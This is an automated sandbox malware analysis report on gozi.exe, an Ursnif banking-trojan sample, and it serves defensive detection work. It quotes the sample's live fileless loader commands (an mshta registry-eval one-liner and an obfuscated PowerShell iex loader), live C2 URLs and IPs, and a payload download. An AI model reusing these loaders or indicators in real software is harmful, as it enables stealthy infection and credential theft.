Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report gozi.exe

Overview

General Information

Sample Name:gozi.exe
Analysis ID:551701
MD5:8ee79738c37a919fdf38dc5a621556ce
SHA1:ae35e761cd1633fa8b70bda3c2e3649c1694ffd1
SHA256:51037666d1982db93e3123e88594d409805d3f1d970e9f926dcadb99f77f50f6
Tags:exegozi
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Tries to steal Mail credentials (via file / registry access)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Sigma detected: MSHTA Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Uses ping.exe to check the status of other devices and networks
Modifies the prolog of user mode functions (user mode inline hooks)
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Modifies the import address table of user mode modules (user mode IAT hooks)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Queries the installation date of Windows
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Csc.exe Source File Folder
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • gozi.exe (PID: 6992 cmdline: "C:\Users\user\Desktop\gozi.exe" MD5: 8EE79738C37A919FDF38DC5A621556CE)
    • RegAsm.exe (PID: 5696 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • control.exe (PID: 5676 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
        • rundll32.exe (PID: 4364 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • mshta.exe (PID: 2928 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Djqr='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Djqr).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6536 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6620 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4876 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F8.tmp" "c:\Users\user\AppData\Local\Temp\CSC8CA7551FEF4543EEA6FB885A13AF16EB.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5700 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5664 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8712.tmp" "c:\Users\user\AppData\Local\Temp\CSC31C5CF8C116B47DEB51FEE2BA7A26AB5.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 2960 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 4580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 3640 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
        • RuntimeBroker.exe (PID: 4084 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 4488 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\3B0F.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • nslookup.exe (PID: 5340 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
        • RuntimeBroker.exe (PID: 4176 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 3200 cmdline: cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\3B0F.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 4292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • RuntimeBroker.exe (PID: 4440 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 6020 cmdline: "C:\Windows\syswow64\cmd.exe" /C pause dll mail, , MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000024.00000000.539555209.0000020FDEA80000.00000040.00020000.sdmpJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
    0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000008.00000003.392490032.0000000003408000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          0000002D.00000000.652250920.000001EAE4570000.00000040.00020000.sdmpJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
            Click to see the 49 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.3.RegAsm.exe.330a4a0.0.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
              8.3.RegAsm.exe.330a4a0.0.raw.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
                8.3.RegAsm.exe.33b8f40.2.raw.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
                  8.3.RegAsm.exe.33894a0.1.raw.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security

                    Sigma Overview

                    System Summary:

                    barindex
                    Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
                    Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Users\user\Desktop\gozi.exe" , ParentImage: C:\Users\user\Desktop\gozi.exe, ParentProcessId: 6992, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 5696
                    Sigma detected: MSHTA Spawning Windows ShellShow sources
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Djqr='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Djqr).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2928, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), ProcessId: 6536
                    Sigma detected: Mshta Spawning Windows ShellShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Djqr='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Djqr).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2928, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), ProcessId: 6536
                    Sigma detected: Suspicious Rundll32 ActivityShow sources
                    Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 5676, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, ProcessId: 4364
                    Sigma detected: Suspicious Csc.exe Source File FolderShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6536, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline, ProcessId: 6620
                    Sigma detected: Possible Applocker BypassShow sources
                    Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Users\user\Desktop\gozi.exe" , ParentImage: C:\Users\user\Desktop\gozi.exe, ParentProcessId: 6992, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 5696
                    Sigma detected: Non Interactive PowerShellShow sources
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Djqr='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Djqr).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2928, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), ProcessId: 6536
                    Sigma detected: T1086 PowerShell ExecutionShow sources
                    Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132864949359535906.6536.DefaultAppDomain.powershell

                    Jbx Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Antivirus detection for URL or domainShow sources
                    Source: http://apr.intooltak.com/lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSHAvira URL Cloud: Label: malware
                    Source: http://apr.intooltak.com/vlSm5FdhwFmMvT/YOr1y3vmv8eg4Ac3b7Y_2/BxNzh6No2PWjhu_2/Fyyb9C79h8hjmv0/0MJdM07T0vYSwv1YW8/_2F13x6Wl/Lrng4lSkMN3h4WUh3_2B/V0ttocBRKlq9AtXNAro/11M6x_2BaL1Zjx_2BWp4qX/FgWuexW_2FQbO/w_2FMf21/MXsR7_2BkMZgcjp0nVIxUlY/KUQNsPRxFs/f5vu_2BQoVI2fu6H_/2BIGCwdRzvbj/hz_2BIOSiZR/JFogKN88OOAHtb/M_2BNELxC21s15Johd0jZ/ulyOnBSm1PSraDUT/nl6kvDdqLoljmN_/2B2yicis3/ZYLrAvira URL Cloud: Label: malware
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: gozi.exeVirustotal: Detection: 38%Perma Link
                    Source: gozi.exeMetadefender: Detection: 40%Perma Link
                    Source: gozi.exeReversingLabs: Detection: 65%
                    Antivirus / Scanner detection for submitted sampleShow sources
                    Source: gozi.exeAvira: detected
                    Machine Learning detection for sampleShow sources
                    Source: gozi.exeJoe Sandbox ML: detected
                    Source: 8.0.RegAsm.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                    Source: 2.2.gozi.exe.32857b4.1.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.0.RegAsm.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                    Source: 8.0.RegAsm.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                    Source: 8.0.RegAsm.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                    Source: 8.0.RegAsm.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                    Source: 8.0.RegAsm.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                    Source: 8.0.RegAsm.exe.400000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                    Source: 2.2.gozi.exe.329b084.2.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                    Source: 8.0.RegAsm.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_010A7479 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,8_2_010A7479
                    Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49743 version: TLS 1.2
                    Source: gozi.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                    Source: Binary string: .C:\Users\user\AppData\Local\Temp\5n300s0s.pdbXP source: powershell.exe, 00000016.00000002.586031203.000002033C29E000.00000004.00000001.sdmp
                    Source: Binary string: ntdll.pdb source: RegAsm.exe, 00000008.00000003.460334306.00000000044C0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000003.467008744.0000000004570000.00000004.00000001.sdmp
                    Source: Binary string: .C:\Users\user\AppData\Local\Temp\5n300s0s.pdb source: powershell.exe, 00000016.00000002.585929205.000002033C272000.00000004.00000001.sdmp
                    Source: Binary string: ntdll.pdbUGP source: RegAsm.exe, 00000008.00000003.460334306.00000000044C0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000003.467008744.0000000004570000.00000004.00000001.sdmp
                    Source: Binary string: .C:\Users\user\AppData\Local\Temp\hscan34n.pdb source: powershell.exe, 00000016.00000002.585762448.000002033C236000.00000004.00000001.sdmp
                    Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\5n300s0s.pdb source: powershell.exe, 00000016.00000003.533928373.000002035019D000.00000004.00000001.sdmp
                    Source: Binary string: C:\Users\Administrator\Desktop\New folder\bin\Debug\SLN\transport-manager\obj\Debug\transport-manager.pdb source: gozi.exe, gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp
                    Source: Binary string: .C:\Users\user\AppData\Local\Temp\hscan34n.pdbXP source: powershell.exe, 00000016.00000002.585929205.000002033C272000.00000004.00000001.sdmp
                    Source: Binary string: EventManager.pdb source: gozi.exe, 00000002.00000002.328151243.0000000004199000.00000004.00000001.sdmp
                    Source: Binary string: Local\{6FD9BC09-0238-7997-8413-56BDF8F7EA41}n.pdb source: powershell.exe, 00000016.00000003.533928373.000002035019D000.00000004.00000001.sdmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_03F18409 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,8_2_03F18409
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_03F1B9D4 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,8_2_03F1B9D4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_03F0E91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,8_2_03F0E91D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_03F22ECF lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,8_2_03F22ECF
                    Source: C:\Windows\SysWOW64\cmd.exeCode function: 47_2_0303E91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,47_2_0303E91D
                    Source: C:\Windows\SysWOW64\cmd.exeCode function: 47_2_0304B9D4 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,47_2_0304B9D4
                    Source: C:\Windows\SysWOW64\cmd.exeCode function: 47_2_03052ECF memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,47_2_03052ECF

                    Networking:

                    barindex
                    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                    Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49751 -> 185.189.12.123:80
                    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49751 -> 185.189.12.123:80
                    Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49752 -> 185.189.12.123:80
                    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49752 -> 185.189.12.123:80
                    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49754 -> 185.189.12.123:80
                    Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49820 -> 185.189.12.123:80
                    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49820 -> 185.189.12.123:80
                    System process connects to network (likely due to code injection or exploit)Show sources
                    Source: C:\Windows\explorer.exeDomain query: io.immontyr.com
                    Uses nslookup.exe to query domainsShow sources
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                    May check the online IP address of the machineShow sources
                    Source: C:\Windows\System32\nslookup.exeDNS query: name: myip.opendns.com
                    Source: C:\Windows\System32\nslookup.exeDNS query: name: myip.opendns.com
                    Uses ping.exe to check the status of other devices and networksShow sources
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                    Source: global trafficHTTP traffic detected: GET /get/3dvhcv/lia.exe HTTP/1.1Host: transfer.shConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /vlSm5FdhwFmMvT/YOr1y3vmv8eg4Ac3b7Y_2/BxNzh6No2PWjhu_2/Fyyb9C79h8hjmv0/0MJdM07T0vYSwv1YW8/_2F13x6Wl/Lrng4lSkMN3h4WUh3_2B/V0ttocBRKlq9AtXNAro/11M6x_2BaL1Zjx_2BWp4qX/FgWuexW_2FQbO/w_2FMf21/MXsR7_2BkMZgcjp0nVIxUlY/KUQNsPRxFs/f5vu_2BQoVI2fu6H_/2BIGCwdRzvbj/hz_2BIOSiZR/JFogKN88OOAHtb/M_2BNELxC21s15Johd0jZ/ulyOnBSm1PSraDUT/nl6kvDdqLoljmN_/2B2yicis3/ZYLr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
                    Source: global trafficHTTP traffic detected: GET /g37w_2FYO/KW18Y37P4Dg_2F1TMh_2/FK2ujRayUy6lspI6qOC/AgWOSVQoUjByibFH6VxOps/v3Ehdrv875bm_/2Bs0w7UO/8HLDir_2FrS7hQvf7_2F_2F/dRVLAAfuPh/m30EKXD6FtreycZoi/lobTM_2FcJdc/YK8geqpXCxP/dDLbqs1jlQyVsA/bp_2Fxijgc04UGfwb6H7A/hHd5lPMnnVOlY1xb/cpTKFIgzAGJyGab/7_2BPVHreJHJUQdZTy/CjJC9x69g/tFYle1uxB8JrgYxIiF_2/BMgOKImH_2BEsdbiTm7/xqsfHc14yTZglOas0gOCoM/8tPVx3GttAeuK/bZvFimTpFp_2B/LS HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
